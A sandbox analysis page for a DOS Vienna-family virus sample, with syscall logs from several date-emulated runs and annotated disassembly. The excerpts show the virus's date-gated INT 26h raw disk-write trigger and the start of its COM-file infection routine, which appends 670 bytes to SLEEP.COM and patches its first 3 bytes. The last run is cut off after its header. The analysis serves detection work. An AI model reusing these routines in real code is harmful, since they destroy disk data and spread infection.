Sample viewer

vx.netlux.org/Virus.DOS.Vienna.DDrUS.670


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:53:14.307068874Z 48 PC: 12a69 | Get DOS version
2018-12-17T22:53:14.308222204Z 47 PC: 12a75 | Get disk transfer address
2018-12-17T22:53:14.309391187Z 26 PC: 12a85 | Set disk transfer address
; Code window printed from the return address of INT 21h/AH=2Ah (Get date). It is a
; linear listing: both arms of every branch appear, so it is not the executed path.
; Date-gated trigger: year, month and day are tested one after another, each against
; its own threshold; only if all three pass does control reach the INT 26h sequence
; at 0x12ab2. The tests are independent, so the day test (>= 22) applies in every
; qualifying month.
; This run also logs Get date returns at 12aa0 and 12aab, so the year and month
; tests passed here.
2018-12-17T22:53:14.310435429Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6  ; CX = year from Get date; 0x7c6 = 1990
0x12a98: jge 0x12a9c  ; year >= 1990 (signed compare): continue to the month test
0x12a9a: jmp 0x12ac4  ; otherwise skip the trigger
0x12a9c: mov ah, 0x2a  ; AH=2Ah: Get date again
0x12a9e: int 0x21
0x12aa0: cmp dh, 6  ; DH = month
0x12aa3: jge 0x12aa7  ; month >= 6: continue to the day test
0x12aa5: jmp 0x12ac4
0x12aa7: mov ah, 0x2a  ; third Get date call
0x12aa9: int 0x21
0x12aab: cmp dl, 0x16  ; DL = day of month; 0x16 = 22
0x12aae: jge 0x12ab2  ; day >= 22: fall into the disk-write setup
0x12ab0: jmp 0x12ac4
0x12ab2: mov al, 1  ; INT 26h argument: AL = drive number (1 = B: in the 0 = A: numbering)
0x12ab4: mov cx, 1  ; CX = number of sectors: one
0x12ab7: mov dx, 0  ; DX = first logical sector: 0
0x12aba: mov ds, word ptr [di + 0x37]  ; DS:BX = source buffer; both words come from [di+...], contents not visible in this trace
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26  ; DOS absolute disk write: raw sector write that bypasses the file system (the destructive step)
0x12ac2: jmp 0x12ac4
; Code window printed from the return address of the second Get date call (the one
; issued at 0x12a9e). Linear listing: both arms of each branch are shown.
; Remaining part of the date gate (month, then day), the INT 26h sequence it guards,
; and the first instructions of the code that follows at 0x12ac4.
2018-12-17T22:53:14.31191245Z 42 PC: 12aa0 | Get date 0x12aa0: cmp dh, 6  ; DH = month from Get date
0x12aa3: jge 0x12aa7  ; month >= 6 (signed compare): continue to the day test
0x12aa5: jmp 0x12ac4  ; otherwise skip the trigger
0x12aa7: mov ah, 0x2a  ; AH=2Ah: Get date again
0x12aa9: int 0x21
0x12aab: cmp dl, 0x16  ; DL = day of month; 0x16 = 22
0x12aae: jge 0x12ab2  ; day >= 22: fall into the disk-write setup
0x12ab0: jmp 0x12ac4
0x12ab2: mov al, 1  ; INT 26h argument: AL = drive number (1 = B: in the 0 = A: numbering)
0x12ab4: mov cx, 1  ; CX = number of sectors: one
0x12ab7: mov dx, 0  ; DX = first logical sector: 0
0x12aba: mov ds, word ptr [di + 0x37]  ; DS:BX = source buffer; contents not visible in this trace
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26  ; DOS absolute disk write: raw sector write that bypasses the file system
0x12ac2: jmp 0x12ac4
0x12ac4: pop si  ; SI taken from the stack and pushed straight back; presumably the body's base pointer (TODO confirm)
0x12ac5: push si
0x12ac6: add si, 0x31  ; SI -> bytes at base+0x31 (not shown on this page)
0x12ac9: lodsb al, byte ptr [si]  ; AL = first of those bytes
0x12aca: mov cx, 0x8000  ; count 0x8000; its use lies past the end of this window
; Code window printed from the return address of the third Get date call (the one
; issued at 0x12aa9). Linear listing: both arms of each branch are shown.
; Last test of the date gate, the INT 26h sequence it guards, then a byte-pattern
; search starting at 0x12ac4.
; NOTE(review): the next entry in this run is Find first file at 12b3c. Whether the
; day test passed cannot be read from the table unless the sandbox also logs INT 26h;
; confirm before concluding that the payload did or did not run.
2018-12-17T22:53:14.314488899Z 42 PC: 12aab | Get date 0x12aab: cmp dl, 0x16  ; DL = day of month from Get date; 0x16 = 22
0x12aae: jge 0x12ab2  ; day >= 22 (signed compare): fall into the disk-write setup
0x12ab0: jmp 0x12ac4  ; otherwise skip the trigger
0x12ab2: mov al, 1  ; INT 26h argument: AL = drive number (1 = B: in the 0 = A: numbering)
0x12ab4: mov cx, 1  ; CX = number of sectors: one
0x12ab7: mov dx, 0  ; DX = first logical sector: 0
0x12aba: mov ds, word ptr [di + 0x37]  ; DS:BX = source buffer; contents not visible in this trace
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26  ; DOS absolute disk write: raw sector write that bypasses the file system
0x12ac2: jmp 0x12ac4
0x12ac4: pop si  ; SI taken from the stack and pushed straight back; presumably the body's base pointer (TODO confirm)
0x12ac5: push si
0x12ac6: add si, 0x31  ; SI -> pattern bytes at base+0x31 (not shown on this page)
0x12ac9: lodsb al, byte ptr [si]  ; AL = first pattern byte
0x12aca: mov cx, 0x8000  ; scan limit: 0x8000 bytes
0x12acd: repne scasb al, byte ptr es:[di]  ; scan ES:DI for that byte
0x12acf: mov cx, 4  ; four more bytes to compare; the loop tail is outside this window
0x12ad2: lodsb al, byte ptr [si]  ; next pattern byte
0x12ad3: scasb al, byte ptr es:[di]  ; compared with the byte following the match
0x12ad4: jne 0x12ac4  ; mismatch: reload the pattern pointer and keep scanning
2018-12-17T22:53:14.316596256Z 78 PC: 12b3c | Find first file
2018-12-17T22:53:14.322529107Z 67 PC: 12b78 | Get or set file attributes
2018-12-17T22:53:14.326783311Z 67 PC: 12b88 | Get or set file attributes
2018-12-17T22:53:14.343434889Z 61 PC: 12b92 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:53:14.347828582Z 87 PC: 12b9e | Get or set file date and time
; Code window printed from the return address of INT 21h/AH=2Ch (Get time): start of
; the routine that modifies the opened file (SLEEP.COM in this run's log).
; Reading it with the log entries around it: an attribute call and a date/time call
; precede the writes and follow them (presumably save, then restore), 670 bytes are
; written after the seek to end of file, and 3 bytes after a second seek. Timestamps
; are therefore a weak indicator for this sample; file length and the first three
; bytes compared against a known-good copy are the useful checks.
2018-12-17T22:53:14.350156657Z 44 PC: 12ba8 | Get time 0x12ba8: and dh, 7  ; DH = seconds from Get time, masked to 0..7
0x12bab: jmp 0x12bad  ; unconditional jump to the next instruction: the masked value is not tested in this window
0x12bad: mov ah, 0x3f  ; AH=3Fh: read from file handle
0x12baf: mov cx, 3  ; three bytes
0x12bb2: mov dx, 0x21
0x12bb5: add dx, si  ; destination buffer = SI+0x21
0x12bb7: int 0x21  ; logged below as "Read 3 bytes on handle 5"
0x12bb9: jb 0x12c0e  ; carry set = DOS error: abandon the modification
0x12bbb: cmp ax, 3
0x12bbe: jne 0x12c0e  ; fewer than 3 bytes read: abandon
0x12bc0: mov ax, 0x4202  ; AH=42h/AL=02h: move file pointer relative to end of file
0x12bc3: mov cx, 0
0x12bc6: mov dx, 0  ; offset CX:DX = 0, so the call returns the file length
0x12bc9: int 0x21
0x12bcb: jb 0x12c0e
0x12bcd: mov cx, ax  ; AX = low word of the length
0x12bcf: sub ax, 3
0x12bd2: mov word ptr [si + 0x25], ax  ; length-3 saved at SI+0x25; presumably the operand of the 3-byte jump written at the file start (TODO confirm)
0x12bd5: add cx, 0x2fd  ; length + 0x2fd kept in CX; its use lies past the end of this window
0x12bd9: mov di, si
2018-12-17T22:53:14.352477905Z 63 PC: 12bb9 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:14.358951288Z 66 PC: 12bcb | Move file pointer
2018-12-17T22:53:14.361548554Z 64 PC: 12bee | Write file or device (Write 670 bytes on handle 5)
2018-12-17T22:53:14.370724126Z 66 PC: 12c00 | Move file pointer
2018-12-17T22:53:14.372567073Z 64 PC: 12c0e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:14.386407641Z 87 PC: 12c1f | Get or set file date and time
2018-12-17T22:53:14.38819748Z 62 PC: 12c23 | Close file
2018-12-17T22:53:14.396033103Z 67 PC: 12c30 | Get or set file attributes
2018-12-17T22:53:14.406541464Z 26 PC: 12c3b | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11157,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:02.183670602Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:02.185928804Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:02.187827462Z 26 PC: 12a85 | Set disk transfer address
; Code window printed from the return address of INT 21h/AH=2Ah (Get date). It is a
; linear listing: both arms of every branch appear, so it is not the executed path.
; Date-gated trigger: year, month and day are tested one after another, each against
; its own threshold; only if all three pass does control reach the INT 26h sequence
; at 0x12ab2.
; NOTE(review): this run logs no further Get date; the next entry is Find first file,
; so presumably the year test failed. The JSON record just above this run's
; "Syscalls:" header (Year 1980) looks like the emulated date; confirm against the
; sandbox's format.
2018-12-25T12:30:02.18954181Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6  ; CX = year from Get date; 0x7c6 = 1990
0x12a98: jge 0x12a9c  ; year >= 1990 (signed compare): continue to the month test
0x12a9a: jmp 0x12ac4  ; otherwise skip the trigger
0x12a9c: mov ah, 0x2a  ; AH=2Ah: Get date again
0x12a9e: int 0x21
0x12aa0: cmp dh, 6  ; DH = month
0x12aa3: jge 0x12aa7  ; month >= 6: continue to the day test
0x12aa5: jmp 0x12ac4
0x12aa7: mov ah, 0x2a  ; third Get date call
0x12aa9: int 0x21
0x12aab: cmp dl, 0x16  ; DL = day of month; 0x16 = 22
0x12aae: jge 0x12ab2  ; day >= 22: fall into the disk-write setup
0x12ab0: jmp 0x12ac4
0x12ab2: mov al, 1  ; INT 26h argument: AL = drive number (1 = B: in the 0 = A: numbering)
0x12ab4: mov cx, 1  ; CX = number of sectors: one
0x12ab7: mov dx, 0  ; DX = first logical sector: 0
0x12aba: mov ds, word ptr [di + 0x37]  ; DS:BX = source buffer; contents not visible in this trace
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26  ; DOS absolute disk write: raw sector write that bypasses the file system (the destructive step)
0x12ac2: jmp 0x12ac4
2018-12-25T12:30:02.192597999Z 78 PC: 12b3c | Find first file
2018-12-25T12:30:02.199984548Z 67 PC: 12b78 | Get or set file attributes
2018-12-25T12:30:02.206105709Z 67 PC: 12b88 | Get or set file attributes
2018-12-25T12:30:02.224219159Z 61 PC: 12b92 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:02.23248842Z 87 PC: 12b9e | Get or set file date and time
; Code window printed from the return address of INT 21h/AH=2Ch (Get time): start of
; the routine that modifies the opened file (SLEEP.COM in this run's log).
; Reading it with the log entries around it: an attribute call and a date/time call
; precede the writes and follow them (presumably save, then restore), 670 bytes are
; written after the seek to end of file, and 3 bytes after a second seek. Timestamps
; are therefore a weak indicator for this sample; file length and the first three
; bytes compared against a known-good copy are the useful checks.
2018-12-25T12:30:02.234047203Z 44 PC: 12ba8 | Get time 0x12ba8: and dh, 7  ; DH = seconds from Get time, masked to 0..7
0x12bab: jmp 0x12bad  ; unconditional jump to the next instruction: the masked value is not tested in this window
0x12bad: mov ah, 0x3f  ; AH=3Fh: read from file handle
0x12baf: mov cx, 3  ; three bytes
0x12bb2: mov dx, 0x21
0x12bb5: add dx, si  ; destination buffer = SI+0x21
0x12bb7: int 0x21  ; logged below as "Read 3 bytes on handle 5"
0x12bb9: jb 0x12c0e  ; carry set = DOS error: abandon the modification
0x12bbb: cmp ax, 3
0x12bbe: jne 0x12c0e  ; fewer than 3 bytes read: abandon
0x12bc0: mov ax, 0x4202  ; AH=42h/AL=02h: move file pointer relative to end of file
0x12bc3: mov cx, 0
0x12bc6: mov dx, 0  ; offset CX:DX = 0, so the call returns the file length
0x12bc9: int 0x21
0x12bcb: jb 0x12c0e
0x12bcd: mov cx, ax  ; AX = low word of the length
0x12bcf: sub ax, 3
0x12bd2: mov word ptr [si + 0x25], ax  ; length-3 saved at SI+0x25; presumably the operand of the 3-byte jump written at the file start (TODO confirm)
0x12bd5: add cx, 0x2fd  ; length + 0x2fd kept in CX; its use lies past the end of this window
0x12bd9: mov di, si
2018-12-25T12:30:02.236394515Z 63 PC: 12bb9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:02.245352735Z 66 PC: 12bcb | Move file pointer
2018-12-25T12:30:02.247843466Z 64 PC: 12bee | Write file or device (Write 670 bytes on handle 5)
2018-12-25T12:30:02.266764012Z 66 PC: 12c00 | Move file pointer
2018-12-25T12:30:02.269972284Z 64 PC: 12c0e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:02.277404945Z 87 PC: 12c1f | Get or set file date and time
2018-12-25T12:30:02.279092316Z 62 PC: 12c23 | Close file
2018-12-25T12:30:02.288158985Z 67 PC: 12c30 | Get or set file attributes
2018-12-25T12:30:02.295295267Z 26 PC: 12c3b | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1990,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11157,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:02.795865335Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:02.79732891Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:02.798309023Z 26 PC: 12a85 | Set disk transfer address
; Code window printed from the return address of INT 21h/AH=2Ah (Get date). It is a
; linear listing: both arms of every branch appear, so it is not the executed path.
; Date-gated trigger: year, month and day are tested one after another, each against
; its own threshold; only if all three pass does control reach the INT 26h sequence
; at 0x12ab2.
; NOTE(review): this run logs one more Get date (return at 12aa0) and none at 12aab,
; so the year test passed and presumably the month test failed. The JSON record just
; above this run's "Syscalls:" header (Year 1990, Month 1) looks like the emulated
; date; confirm against the sandbox's format.
2018-12-25T12:30:02.799192056Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6  ; CX = year from Get date; 0x7c6 = 1990
0x12a98: jge 0x12a9c  ; year >= 1990 (signed compare): continue to the month test
0x12a9a: jmp 0x12ac4  ; otherwise skip the trigger
0x12a9c: mov ah, 0x2a  ; AH=2Ah: Get date again
0x12a9e: int 0x21
0x12aa0: cmp dh, 6  ; DH = month
0x12aa3: jge 0x12aa7  ; month >= 6: continue to the day test
0x12aa5: jmp 0x12ac4
0x12aa7: mov ah, 0x2a  ; third Get date call
0x12aa9: int 0x21
0x12aab: cmp dl, 0x16  ; DL = day of month; 0x16 = 22
0x12aae: jge 0x12ab2  ; day >= 22: fall into the disk-write setup
0x12ab0: jmp 0x12ac4
0x12ab2: mov al, 1  ; INT 26h argument: AL = drive number (1 = B: in the 0 = A: numbering)
0x12ab4: mov cx, 1  ; CX = number of sectors: one
0x12ab7: mov dx, 0  ; DX = first logical sector: 0
0x12aba: mov ds, word ptr [di + 0x37]  ; DS:BX = source buffer; contents not visible in this trace
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26  ; DOS absolute disk write: raw sector write that bypasses the file system (the destructive step)
0x12ac2: jmp 0x12ac4
; Code window printed from the return address of the second Get date call (the one
; issued at 0x12a9e). Linear listing: both arms of each branch are shown.
; Remaining part of the date gate (month, then day), the INT 26h sequence it guards,
; and the first instructions of the code that follows at 0x12ac4.
; NOTE(review): no Get date return at 12aab is logged after this entry, so presumably
; the month test failed in this run.
2018-12-25T12:30:02.802024681Z 42 PC: 12aa0 | Get date 0x12aa0: cmp dh, 6  ; DH = month from Get date
0x12aa3: jge 0x12aa7  ; month >= 6 (signed compare): continue to the day test
0x12aa5: jmp 0x12ac4  ; otherwise skip the trigger
0x12aa7: mov ah, 0x2a  ; AH=2Ah: Get date again
0x12aa9: int 0x21
0x12aab: cmp dl, 0x16  ; DL = day of month; 0x16 = 22
0x12aae: jge 0x12ab2  ; day >= 22: fall into the disk-write setup
0x12ab0: jmp 0x12ac4
0x12ab2: mov al, 1  ; INT 26h argument: AL = drive number (1 = B: in the 0 = A: numbering)
0x12ab4: mov cx, 1  ; CX = number of sectors: one
0x12ab7: mov dx, 0  ; DX = first logical sector: 0
0x12aba: mov ds, word ptr [di + 0x37]  ; DS:BX = source buffer; contents not visible in this trace
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26  ; DOS absolute disk write: raw sector write that bypasses the file system
0x12ac2: jmp 0x12ac4
0x12ac4: pop si  ; SI taken from the stack and pushed straight back; presumably the body's base pointer (TODO confirm)
0x12ac5: push si
0x12ac6: add si, 0x31  ; SI -> bytes at base+0x31 (not shown on this page)
0x12ac9: lodsb al, byte ptr [si]  ; AL = first of those bytes
0x12aca: mov cx, 0x8000  ; count 0x8000; its use lies past the end of this window
2018-12-25T12:30:02.804164944Z 78 PC: 12b3c | Find first file
2018-12-25T12:30:02.810106565Z 67 PC: 12b78 | Get or set file attributes
2018-12-25T12:30:02.816748048Z 67 PC: 12b88 | Get or set file attributes
2018-12-25T12:30:02.835448102Z 61 PC: 12b92 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:02.842544552Z 87 PC: 12b9e | Get or set file date and time
; Code window printed from the return address of INT 21h/AH=2Ch (Get time): start of
; the routine that modifies the opened file (SLEEP.COM in this run's log).
; Reading it with the log entries around it: an attribute call and a date/time call
; precede the writes and follow them (presumably save, then restore), 670 bytes are
; written after the seek to end of file, and 3 bytes after a second seek. Timestamps
; are therefore a weak indicator for this sample; file length and the first three
; bytes compared against a known-good copy are the useful checks.
2018-12-25T12:30:02.844357608Z 44 PC: 12ba8 | Get time 0x12ba8: and dh, 7  ; DH = seconds from Get time, masked to 0..7
0x12bab: jmp 0x12bad  ; unconditional jump to the next instruction: the masked value is not tested in this window
0x12bad: mov ah, 0x3f  ; AH=3Fh: read from file handle
0x12baf: mov cx, 3  ; three bytes
0x12bb2: mov dx, 0x21
0x12bb5: add dx, si  ; destination buffer = SI+0x21
0x12bb7: int 0x21  ; logged below as "Read 3 bytes on handle 5"
0x12bb9: jb 0x12c0e  ; carry set = DOS error: abandon the modification
0x12bbb: cmp ax, 3
0x12bbe: jne 0x12c0e  ; fewer than 3 bytes read: abandon
0x12bc0: mov ax, 0x4202  ; AH=42h/AL=02h: move file pointer relative to end of file
0x12bc3: mov cx, 0
0x12bc6: mov dx, 0  ; offset CX:DX = 0, so the call returns the file length
0x12bc9: int 0x21
0x12bcb: jb 0x12c0e
0x12bcd: mov cx, ax  ; AX = low word of the length
0x12bcf: sub ax, 3
0x12bd2: mov word ptr [si + 0x25], ax  ; length-3 saved at SI+0x25; presumably the operand of the 3-byte jump written at the file start (TODO confirm)
0x12bd5: add cx, 0x2fd  ; length + 0x2fd kept in CX; its use lies past the end of this window
0x12bd9: mov di, si
2018-12-25T12:30:02.846737361Z 63 PC: 12bb9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:02.852839823Z 66 PC: 12bcb | Move file pointer
2018-12-25T12:30:02.854388453Z 64 PC: 12bee | Write file or device (Write 670 bytes on handle 5)
2018-12-25T12:30:02.862664438Z 66 PC: 12c00 | Move file pointer
2018-12-25T12:30:02.864506933Z 64 PC: 12c0e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:02.870935346Z 87 PC: 12c1f | Get or set file date and time
2018-12-25T12:30:02.876313667Z 62 PC: 12c23 | Close file
2018-12-25T12:30:02.884363246Z 67 PC: 12c30 | Get or set file attributes
2018-12-25T12:30:02.894647717Z 26 PC: 12c3b | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11157,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:03.098401087Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:03.107426695Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:03.108390021Z 26 PC: 12a85 | Set disk transfer address
; Code window printed from the return address of INT 21h/AH=2Ah (Get date). It is a
; linear listing: both arms of every branch appear, so it is not the executed path.
; Date-gated trigger: year, month and day are tested one after another, each against
; its own threshold; only if all three pass does control reach the INT 26h sequence
; at 0x12ab2.
; NOTE(review): this run logs no further Get date; the next entry is Find first file,
; so presumably the year test failed. The JSON record just above this run's
; "Syscalls:" header (Year 1980) looks like the emulated date; confirm against the
; sandbox's format.
2018-12-25T12:30:03.109285637Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6  ; CX = year from Get date; 0x7c6 = 1990
0x12a98: jge 0x12a9c  ; year >= 1990 (signed compare): continue to the month test
0x12a9a: jmp 0x12ac4  ; otherwise skip the trigger
0x12a9c: mov ah, 0x2a  ; AH=2Ah: Get date again
0x12a9e: int 0x21
0x12aa0: cmp dh, 6  ; DH = month
0x12aa3: jge 0x12aa7  ; month >= 6: continue to the day test
0x12aa5: jmp 0x12ac4
0x12aa7: mov ah, 0x2a  ; third Get date call
0x12aa9: int 0x21
0x12aab: cmp dl, 0x16  ; DL = day of month; 0x16 = 22
0x12aae: jge 0x12ab2  ; day >= 22: fall into the disk-write setup
0x12ab0: jmp 0x12ac4
0x12ab2: mov al, 1  ; INT 26h argument: AL = drive number (1 = B: in the 0 = A: numbering)
0x12ab4: mov cx, 1  ; CX = number of sectors: one
0x12ab7: mov dx, 0  ; DX = first logical sector: 0
0x12aba: mov ds, word ptr [di + 0x37]  ; DS:BX = source buffer; contents not visible in this trace
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26  ; DOS absolute disk write: raw sector write that bypasses the file system (the destructive step)
0x12ac2: jmp 0x12ac4
2018-12-25T12:30:03.111787226Z 78 PC: 12b3c | Find first file
2018-12-25T12:30:03.117381844Z 67 PC: 12b78 | Get or set file attributes
2018-12-25T12:30:03.122769978Z 67 PC: 12b88 | Get or set file attributes
2018-12-25T12:30:03.140935061Z 61 PC: 12b92 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:03.145533148Z 87 PC: 12b9e | Get or set file date and time
; Code window printed from the return address of INT 21h/AH=2Ch (Get time): start of
; the routine that modifies the opened file (SLEEP.COM in this run's log).
; Reading it with the log entries around it: an attribute call and a date/time call
; precede the writes and follow them (presumably save, then restore), 670 bytes are
; written after the seek to end of file, and 3 bytes after a second seek. Timestamps
; are therefore a weak indicator for this sample; file length and the first three
; bytes compared against a known-good copy are the useful checks.
2018-12-25T12:30:03.146557147Z 44 PC: 12ba8 | Get time 0x12ba8: and dh, 7  ; DH = seconds from Get time, masked to 0..7
0x12bab: jmp 0x12bad  ; unconditional jump to the next instruction: the masked value is not tested in this window
0x12bad: mov ah, 0x3f  ; AH=3Fh: read from file handle
0x12baf: mov cx, 3  ; three bytes
0x12bb2: mov dx, 0x21
0x12bb5: add dx, si  ; destination buffer = SI+0x21
0x12bb7: int 0x21  ; logged below as "Read 3 bytes on handle 5"
0x12bb9: jb 0x12c0e  ; carry set = DOS error: abandon the modification
0x12bbb: cmp ax, 3
0x12bbe: jne 0x12c0e  ; fewer than 3 bytes read: abandon
0x12bc0: mov ax, 0x4202  ; AH=42h/AL=02h: move file pointer relative to end of file
0x12bc3: mov cx, 0
0x12bc6: mov dx, 0  ; offset CX:DX = 0, so the call returns the file length
0x12bc9: int 0x21
0x12bcb: jb 0x12c0e
0x12bcd: mov cx, ax  ; AX = low word of the length
0x12bcf: sub ax, 3
0x12bd2: mov word ptr [si + 0x25], ax  ; length-3 saved at SI+0x25; presumably the operand of the 3-byte jump written at the file start (TODO confirm)
0x12bd5: add cx, 0x2fd  ; length + 0x2fd kept in CX; its use lies past the end of this window
0x12bd9: mov di, si
2018-12-25T12:30:03.149246795Z 63 PC: 12bb9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:03.153221552Z 66 PC: 12bcb | Move file pointer
2018-12-25T12:30:03.15419274Z 64 PC: 12bee | Write file or device (Write 670 bytes on handle 5)
2018-12-25T12:30:03.161084529Z 66 PC: 12c00 | Move file pointer
2018-12-25T12:30:03.162266345Z 64 PC: 12c0e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:03.166507291Z 87 PC: 12c1f | Get or set file date and time
2018-12-25T12:30:03.167857574Z 62 PC: 12c23 | Close file
2018-12-25T12:30:03.242595515Z 67 PC: 12c30 | Get or set file attributes
2018-12-25T12:30:03.275931333Z 26 PC: 12c3b | Set disk transfer address

{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11157,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:03.690289944Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:03.692321768Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:03.693626153Z 26 PC: 12a85 | Set disk transfer address
; Code window printed from the return address of INT 21h/AH=2Ah (Get date). It is a
; linear listing: both arms of every branch appear, so it is not the executed path.
; Date-gated trigger: year, month and day are tested one after another, each against
; its own threshold; only if all three pass does control reach the INT 26h sequence
; at 0x12ab2.
; NOTE(review): this run logs no further Get date; the next entry is Find first file,
; so presumably the year test failed. The JSON record just above this run's
; "Syscalls:" header (Month 6, Year 1980) looks like the emulated date; confirm
; against the sandbox's format.
2018-12-25T12:30:03.694766438Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6  ; CX = year from Get date; 0x7c6 = 1990
0x12a98: jge 0x12a9c  ; year >= 1990 (signed compare): continue to the month test
0x12a9a: jmp 0x12ac4  ; otherwise skip the trigger
0x12a9c: mov ah, 0x2a  ; AH=2Ah: Get date again
0x12a9e: int 0x21
0x12aa0: cmp dh, 6  ; DH = month
0x12aa3: jge 0x12aa7  ; month >= 6: continue to the day test
0x12aa5: jmp 0x12ac4
0x12aa7: mov ah, 0x2a  ; third Get date call
0x12aa9: int 0x21
0x12aab: cmp dl, 0x16  ; DL = day of month; 0x16 = 22
0x12aae: jge 0x12ab2  ; day >= 22: fall into the disk-write setup
0x12ab0: jmp 0x12ac4
0x12ab2: mov al, 1  ; INT 26h argument: AL = drive number (1 = B: in the 0 = A: numbering)
0x12ab4: mov cx, 1  ; CX = number of sectors: one
0x12ab7: mov dx, 0  ; DX = first logical sector: 0
0x12aba: mov ds, word ptr [di + 0x37]  ; DS:BX = source buffer; contents not visible in this trace
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26  ; DOS absolute disk write: raw sector write that bypasses the file system (the destructive step)
0x12ac2: jmp 0x12ac4
2018-12-25T12:30:03.697740372Z 78 PC: 12b3c | Find first file
2018-12-25T12:30:03.704756837Z 67 PC: 12b78 | Get or set file attributes
2018-12-25T12:30:03.711658105Z 67 PC: 12b88 | Get or set file attributes
2018-12-25T12:30:04.801121094Z 61 PC: 12b92 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:04.809665465Z 87 PC: 12b9e | Get or set file date and time
; Code window printed from the return address of INT 21h/AH=2Ch (Get time): start of
; the routine that modifies the opened file (SLEEP.COM in this run's log).
; Reading it with the log entries around it: an attribute call and a date/time call
; precede the writes and follow them (presumably save, then restore), 670 bytes are
; written after the seek to end of file, and 3 bytes after a second seek. Timestamps
; are therefore a weak indicator for this sample; file length and the first three
; bytes compared against a known-good copy are the useful checks.
2018-12-25T12:30:04.811222284Z 44 PC: 12ba8 | Get time 0x12ba8: and dh, 7  ; DH = seconds from Get time, masked to 0..7
0x12bab: jmp 0x12bad  ; unconditional jump to the next instruction: the masked value is not tested in this window
0x12bad: mov ah, 0x3f  ; AH=3Fh: read from file handle
0x12baf: mov cx, 3  ; three bytes
0x12bb2: mov dx, 0x21
0x12bb5: add dx, si  ; destination buffer = SI+0x21
0x12bb7: int 0x21  ; logged below as "Read 3 bytes on handle 5"
0x12bb9: jb 0x12c0e  ; carry set = DOS error: abandon the modification
0x12bbb: cmp ax, 3
0x12bbe: jne 0x12c0e  ; fewer than 3 bytes read: abandon
0x12bc0: mov ax, 0x4202  ; AH=42h/AL=02h: move file pointer relative to end of file
0x12bc3: mov cx, 0
0x12bc6: mov dx, 0  ; offset CX:DX = 0, so the call returns the file length
0x12bc9: int 0x21
0x12bcb: jb 0x12c0e
0x12bcd: mov cx, ax  ; AX = low word of the length
0x12bcf: sub ax, 3
0x12bd2: mov word ptr [si + 0x25], ax  ; length-3 saved at SI+0x25; presumably the operand of the 3-byte jump written at the file start (TODO confirm)
0x12bd5: add cx, 0x2fd  ; length + 0x2fd kept in CX; its use lies past the end of this window
0x12bd9: mov di, si
2018-12-25T12:30:04.813631499Z 63 PC: 12bb9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:04.821212298Z 66 PC: 12bcb | Move file pointer
2018-12-25T12:30:04.822692743Z 64 PC: 12bee | Write file or device (Write 670 bytes on handle 5)
2018-12-25T12:30:05.014007823Z 66 PC: 12c00 | Move file pointer
2018-12-25T12:30:05.016482564Z 64 PC: 12c0e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:05.024167502Z 87 PC: 12c1f | Get or set file date and time
2018-12-25T12:30:05.025683957Z 62 PC: 12c23 | Close file
2018-12-25T12:30:05.046841105Z 67 PC: 12c30 | Get or set file attributes
2018-12-25T12:30:05.067095798Z 26 PC: 12c3b | Set disk transfer address

{"DateBased":true,"Day":22,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11157,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:03.82704994Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:03.828595258Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:03.829779284Z 26 PC: 12a85 | Set disk transfer address
; Code window printed from the return address of INT 21h/AH=2Ah (Get date). It is a
; linear listing: both arms of every branch appear, so it is not the executed path.
